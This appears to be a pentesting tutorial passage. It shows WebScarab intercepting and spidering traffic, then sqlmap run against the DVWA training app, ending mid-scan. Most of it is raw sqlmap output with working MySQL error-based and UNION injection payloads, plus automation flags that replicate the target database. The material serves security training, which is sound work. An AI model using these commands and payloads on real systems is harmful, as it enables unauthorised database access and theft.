web application – webscarab

WebScarab is a framework for analysing applications that communicate using the HTTP and HTTPS protocols. It is written in Java, and is thus portable to many platforms. WebScarab has several modes of operation, implemented by a number of plugins. In its most common usage, WebScarab operates as an intercepting proxy, allowing the operator to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser.

backtrack 5r1

/pentest/web/webscarab

root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar

1. Tools / tick Use full-featured interface / close webscarab and then restart it

2. Proxy tab / Listeners tab / shows what port webscarab uses to intercept.

3. Set your browser to point to the port webscarab uses.

Firefox Edit / Preferences / Advanced / Network / Settings / Tick Manual proxy configuration then set port. OK / Close.

4. Back on webscarab Proxy tab / Manual Edit / Tick Intercept requests.

5. Surf on your browser. You will get a pop up from webscarab click the Raw tab.

———————————————————–

Open webscarab results in sqlmap and test Possible Injection points.

1. Spider site with webscarab Summary tab / right click on desired url and Spider tree

2. webscarab stores results in /tmp/webscarab1111.tmp/conversations

3. To run these results through sqlmap
root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations

sqlmap/1.0-dev (r4009) – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user’s responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 01:46:32

[01:46:32] [INFO] sqlmap parsed 9 testable requests from the targets list
[01:46:32] [INFO] sqlmap got a total of 9 targets
url 1:
POST http://ip-address:80/dvwa/login.php
Cookie: PHPSESSID=0121gfds42141happy14jd; security=high
POST data: username=root&password=password&Login=Login
do you want to test this url? [Y/n/q]
> n
url 2:
GET http://ip-address:80/dvwa/index.php
Cookie: PHPSESSID=0121gfds42141happy14jd; security=high
do you want to test this url? [Y/n/q]
> n
url 3:
GET http://ip-address:80/dvwa/dvwa/js/dvwaPage.js
Cookie: PHPSESSID=0121gfds42141happy14jd; security=high
do you want to test this url? [Y/n/q]
> n
url 4:
GET http://ip-address:80/dvwa/dvwa/css/main.css
Cookie: PHPSESSID=0121gfds42141happy14jd; security=high
do you want to test this url? [Y/n/q]
> n
url 5:
POST dvwa/dvwa/css/main.csss-ffox&appver=9.0.1&pver=2.2&wrkey=AKEgNivfOeoCnacqL0R-7j-OaWCqLrzSkU7NQubY8ONjn0adOjkAKZvaMq4BTZQqfRmiSSyTbMAzGPMdEBJLHNN-IWcmF9MBhw==
POST data:
do you want to test this url? [Y/n/q]
> n
url 6:
GET http://ip-address:80/dvwa/setup.php
Cookie: PHPSESSID=0121gfds42141happy14jd; security=high
do you want to test this url? [Y/n/q]
> n
url 7:
GET http://ip-address:80/dvwa/security.php
Cookie: PHPSESSID=0121gfds42141happy14jd; security=high
do you want to test this url? [Y/n/q]
> n
url 8:
GET http://ip-address:80/dvwa/vulnerabilities/sqli/
Cookie: PHPSESSID=0121gfds42141happy14jd; security=low
do you want to test this url? [Y/n/q]
> n
url 9:
GET http://ip-address:80/dvwa/vulnerabilities/sqli/?id=&Submit=Submit
Cookie: PHPSESSID=0121gfds42141happy14jd; security=low
do you want to test this url? [Y/n/q]
> y
[01:46:58] [INFO] testing url http://ip-address:80/dvwa/vulnerabilities/sqli/?id=&Submit=Submit
[01:46:58] [INFO] using ‘/pentest/database/sqlmap/output/ip-address/session’ as session file
[01:46:58] [INFO] using ‘/pentest/database/sqlmap/output/results-2120_42pm.csv’ as results file
[01:46:58] [INFO] testing connection to the target url
[01:47:08] [INFO] testing if the url is stable, wait a few seconds
[01:47:19] [INFO] url is stable
[01:47:19] [INFO] testing if GET parameter ‘id’ is dynamic
[01:47:29] [WARNING] GET parameter ‘id’ appears to be not dynamic
[01:47:39] [WARNING] heuristic test shows that GET parameter ‘id’ might not be injectable
[01:47:39] [INFO] testing sql injection on GET parameter ‘id’
[01:47:39] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[01:48:49] [INFO] heuristics detected web page charset ‘ascii’
[01:49:30] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’
[01:50:10] [INFO] GET parameter ‘id’ is ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’ injectable
[01:50:10] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[01:50:20] [INFO] testing ‘MySQL > 5.0.11 AND time-based blind’
[01:50:30] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 10 columns’
[01:52:10] [INFO] target url appears to be UNION injectable with 2 columns
[01:52:30] [INFO] GET parameter ‘id’ is ‘MySQL UNION query (NULL) – 1 to 10 columns’ injectable
GET parameter ‘id’ is vulnerable. Do you want to keep testing the others? [y/N] y
[01:52:48] [INFO] testing if GET parameter ‘Submit’ is dynamic
[01:52:58] [WARNING] GET parameter ‘Submit’ appears to be not dynamic
[01:53:08] [WARNING] heuristic test shows that GET parameter ‘Submit’ might not be injectable
[01:53:08] [INFO] testing sql injection on GET parameter ‘Submit’
[01:53:08] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[01:55:08] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’
[01:55:48] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[01:56:28] [INFO] testing ‘MySQL > 5.0.11 AND time-based blind’
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[01:57:35] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 10 columns’
[02:04:16] [INFO] testing ‘Generic UNION query (NULL) – 1 to 10 columns’
[02:10:57] [WARNING] GET parameter ‘Submit’ is not injectable
sqlmap identified the following injection points with a total of 135 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=’ AND (SELECT 6575 FROM(SELECT COUNT(*),CONCAT(CHAR(58,102,102,122,58),(SELECT (CASE WHEN (6575=6575) THEN 1 ELSE 0 END)),CHAR(58,104,120,116,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘hxJQ’=’hxJQ&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=’ UNION ALL SELECT NULL, CONCAT(CHAR(58,102,102,122,58),IFNULL(CAST(CHAR(113,66,98,90,65,112,121,88,103,78) AS CHAR),CHAR(32)),CHAR(58,104,120,116,58))# AND ‘KNgC’=’KNgC&Submit=Submit

[02:10:57] [INFO] manual usage of GET payloads requires url encoding
do you want to exploit this SQL injection? [Y/n] y
[02:33:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[02:33:22] [INFO] you can find results of scanning in multiple targets mode inside the CSV file ‘/pentest/database/sqlmap/output/results-2120_42pm.csv’

[*] shutting down at: 02:33:22

4. Location for sqlmap results can be found /pentest/database/sqlmap/output

http://www.myexploit.wordpress.com/information-gathering-sqlmap/

————————————————————————————-

The bellow options with automation was shown to me by The Gentleman Hackers Club Show your support and click on there link!

https://thegentlemanhackersclub.com//

These options will allow SQLmap to test all user defined url’s with out stopping at each question.

NOTE !! (Use the –scope=$regex option or it will attack everything listed in your webscarab1111.tmp/conversations file.)

--batch = select it's 'default'/recommended answer (Y)

--replicate = when an injection is found and it will replicate the database to a local sqlite file

--beep = Beeps when sql injection is found.

--scope=$regex = Only attacks those in your defined scope --scope=^192.168.6.65$ (will only look at all url with the ip address in.

-o optimize

-t logs actual http traffic

--eta .. eta

-v level 3 verbosity show payloads injected (on screen)

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab26244.tmp/conversations --batch --beep --replicate --scope=^192.168.6.65$

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 52:05

[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] sqlmap parsed 12 testable requests from the targets list
[52:05] [INFO] sqlmap got a total of 12 targets
[52:05] [INFO] url 1:
GET http://192.168.6.65:80/dvwa/vulnerabilities/brute/?username=&password=&Login=Login
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:05] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/brute/?username=&password=&Login=Login
[52:05] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:05] [INFO] using '/pentest/database/sqlmap/output/results-08102012_0452pm.csv' as results file
[52:05] [INFO] testing connection to the target url
[52:05] [INFO] testing if the url is stable, wait a few seconds
[52:06] [INFO] url is stable
[52:06] [INFO] testing if GET parameter 'username' is dynamic
[52:06] [WARNING] GET parameter 'username' appears to be not dynamic
[52:07] [INFO] heuristics detected web page charset 'ascii'
[52:07] [INFO] heuristic test shows that GET parameter 'username' might be injectable (possible DBMS: MySQL)
[52:07] [INFO] testing sql injection on GET parameter 'username'
[52:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:07] [INFO] GET parameter 'username' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[52:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:08] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:08] [INFO] target url appears to be UNION injectable with 6 columns
[52:08] [INFO] GET parameter 'username' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
[52:08] [INFO] GET parameter 'username' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: username=' AND (SELECT 7777 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,98,106,58),(SELECT (CASE WHEN (7777=7777) THEN 1 ELSE 0 END)),CHAR(58,111,103,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eAAu'='eAAu&password=&Login=Login

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: username=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,111,98,106,58),IFNULL(CAST(CHAR(102,74,90,71,88,112,109,116,89,111) AS CHAR),CHAR(32)),CHAR(58,111,103,121,58))# AND 'uoQV'='uoQV&password=&Login=Login
---

[52:08] [INFO] manual usage of GET payloads requires url encoding
[52:09] [INFO] do you want to exploit this SQL injection? [Y/n] Y
[52:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[52:09] [INFO] url 2:
GET http://192.168.6.65:80/dvwa/vulnerabilities/sqli/
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:09] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/sqli/
[52:09] [WARNING] you've provided target url without any GET parameters (e.g. http://www.site.com/article.php?id=1) and without providing any POST parameters through --data option
[52:09] [INFO] do you want to try URI injections in the target url itself? [Y/n/q] Y
[52:09] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:09] [INFO] testing connection to the target url
[52:09] [INFO] testing if the url is stable, wait a few seconds
[52:10] [INFO] url is stable
[52:10] [INFO] testing if URI parameter '#1*' is dynamic
[52:10] [INFO] confirming that URI parameter '#1*' is dynamic
[52:10] [INFO] URI parameter '#1*' is dynamic
[52:10] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable
[52:10] [INFO] testing sql injection on URI parameter '#1*'
[52:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:10] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:10] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:10] [INFO] testing 'Oracle AND time-based blind'
[52:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:11] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:11] [WARNING] URI parameter '#1*' is not injectable
[52:11] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:11] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 135 times
[52:11] [INFO] url 3:
GET http://192.168.6.65:80/dvwa/vulnerabilities/sqli/?id=&Submit=Submit
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:11] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/sqli/?id=&Submit=Submit
[52:11] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:11] [INFO] testing connection to the target url
[52:12] [INFO] testing if the url is stable, wait a few seconds
[52:13] [INFO] url is stable
[52:13] [INFO] testing if GET parameter 'id' is dynamic
[52:13] [WARNING] GET parameter 'id' appears to be not dynamic
[52:13] [INFO] heuristics detected web page charset 'ascii'
[52:13] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[52:13] [INFO] testing sql injection on GET parameter 'id'
[52:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:13] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[52:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:14] [INFO] target url appears to be UNION injectable with 2 columns
[52:14] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
[52:14] [INFO] GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=' AND (SELECT 5564 FROM(SELECT COUNT(*),CONCAT(CHAR(58,115,102,119,58),(SELECT (CASE WHEN (5564=5564) THEN 1 ELSE 0 END)),CHAR(58,117,115,112,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LRKO'='LRKO&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=' UNION ALL SELECT CONCAT(CHAR(58,115,102,119,58),IFNULL(CAST(CHAR(84,87,107,88,111,117,108,74,85,104) AS CHAR),CHAR(32)),CHAR(58,117,115,112,58)), NULL# AND 'ZrYe'='ZrYe&Submit=Submit
---

[52:14] [INFO] manual usage of GET payloads requires url encoding
[52:14] [INFO] do you want to exploit this SQL injection? [Y/n] Y
[52:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[52:14] [INFO] url 4:
GET http://192.168.6.65:80/dvwa/vulnerabilities/xss_r/
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:14] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/xss_r/
[52:14] [WARNING] you've provided target url without any GET parameters (e.g. http://www.site.com/article.php?id=1) and without providing any POST parameters through --data option
[52:14] [INFO] do you want to try URI injections in the target url itself? [Y/n/q] Y
[52:14] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:14] [INFO] testing connection to the target url
[52:14] [INFO] testing if the url is stable, wait a few seconds
[52:16] [INFO] url is stable
[52:16] [INFO] testing if URI parameter '#1*' is dynamic
[52:16] [INFO] confirming that URI parameter '#1*' is dynamic
[52:16] [INFO] URI parameter '#1*' is dynamic
[52:16] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable
[52:16] [INFO] testing sql injection on URI parameter '#1*'
[52:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:16] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:17] [INFO] testing 'Oracle AND time-based blind'
[52:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:17] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:18] [WARNING] URI parameter '#1*' is not injectable
[52:18] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:18] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 135 times
[52:18] [INFO] url 5:
GET http://192.168.6.65:80/dvwa/vulnerabilities/xss_r/?name=
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:18] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/xss_r/?name=
[52:18] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:18] [INFO] testing connection to the target url
[52:18] [INFO] testing if the url is stable, wait a few seconds
[52:19] [INFO] url is stable
[52:19] [INFO] testing if GET parameter 'name' is dynamic
[52:19] [WARNING] GET parameter 'name' appears to be not dynamic
[52:19] [WARNING] heuristic test shows that GET parameter 'name' might not be injectable
[52:19] [INFO] testing sql injection on GET parameter 'name'
[52:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:20] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:20] [INFO] testing 'Oracle AND time-based blind'
[52:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:21] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:22] [WARNING] GET parameter 'name' is not injectable
[52:22] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:22] [INFO] url 6:
GET http://192.168.6.65:80/dvwa/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:22] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/upload/
[52:22] [WARNING] you've provided target url without any GET parameters (e.g. http://www.site.com/article.php?id=1) and without providing any POST parameters through --data option
[52:22] [INFO] do you want to try URI injections in the target url itself? [Y/n/q] Y
[52:22] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:22] [INFO] testing connection to the target url
[52:22] [INFO] testing if the url is stable, wait a few seconds
[52:23] [INFO] url is stable
[52:23] [INFO] testing if URI parameter '#1*' is dynamic
[52:23] [INFO] confirming that URI parameter '#1*' is dynamic
[52:23] [INFO] URI parameter '#1*' is dynamic
[52:23] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable
[52:23] [INFO] testing sql injection on URI parameter '#1*'
[52:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:24] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:24] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:24] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:24] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:24] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:24] [INFO] testing 'Oracle AND time-based blind'
[52:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:25] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:25] [WARNING] URI parameter '#1*' is not injectable
[52:25] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:25] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 135 times
[52:25] [INFO] url 7:
GET http://192.168.6.65:80/dvwa/dvwa/js/dvwaPage.js
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:25] [INFO] testing url http://192.168.6.65:80/dvwa/dvwa/js/dvwaPage.js
[52:25] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:25] [INFO] testing connection to the target url
[52:25] [INFO] testing if the url is stable, wait a few seconds
[52:26] [INFO] url is stable
[52:26] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:26] [INFO] url 8:
GET http://192.168.6.65:80/dvwa/dvwa/css/main.css
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:26] [INFO] testing url http://192.168.6.65:80/dvwa/dvwa/css/main.css
[52:26] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:26] [INFO] testing connection to the target url
[52:26] [ERROR] unable to retrieve page content, skipping to the next url
[52:26] [WARNING] HTTP error codes detected during testing:
304 (Not Modified) - 1 times
[52:26] [INFO] url 9:
GET http://192.168.6.65:80/dvwa/vulnerabilities/csrf/
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:26] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/csrf/
[52:26] [WARNING] you've provided target url without any GET parameters (e.g. http://www.site.com/article.php?id=1) and without providing any POST parameters through --data option
[52:26] [INFO] do you want to try URI injections in the target url itself? [Y/n/q] Y
[52:26] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:26] [INFO] testing connection to the target url
[52:26] [INFO] testing if the url is stable, wait a few seconds
[52:28] [INFO] url is stable
[52:28] [INFO] testing if URI parameter '#1*' is dynamic
[52:28] [INFO] confirming that URI parameter '#1*' is dynamic
[52:28] [INFO] URI parameter '#1*' is dynamic
[52:28] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable
[52:28] [INFO] testing sql injection on URI parameter '#1*'
[52:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:28] [INFO] testing 'Oracle AND time-based blind'
[52:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:29] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:29] [WARNING] URI parameter '#1*' is not injectable
[52:29] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:29] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 135 times
[52:29] [INFO] url 10:
GET http://192.168.6.65:80/dvwa/vulnerabilities/csrf/?password_new=&password_conf=&Change=Change
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:29] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/csrf/?password_new=&password_conf=&Change=Change
[52:29] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:29] [INFO] testing connection to the target url
[52:30] [INFO] testing if the url is stable, wait a few seconds
[52:31] [INFO] url is stable
[52:31] [INFO] testing if GET parameter 'password_new' is dynamic
[52:31] [WARNING] GET parameter 'password_new' appears to be not dynamic
[52:31] [WARNING] heuristic test shows that GET parameter 'password_new' might not be injectable
[52:31] [INFO] testing sql injection on GET parameter 'password_new'
[52:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
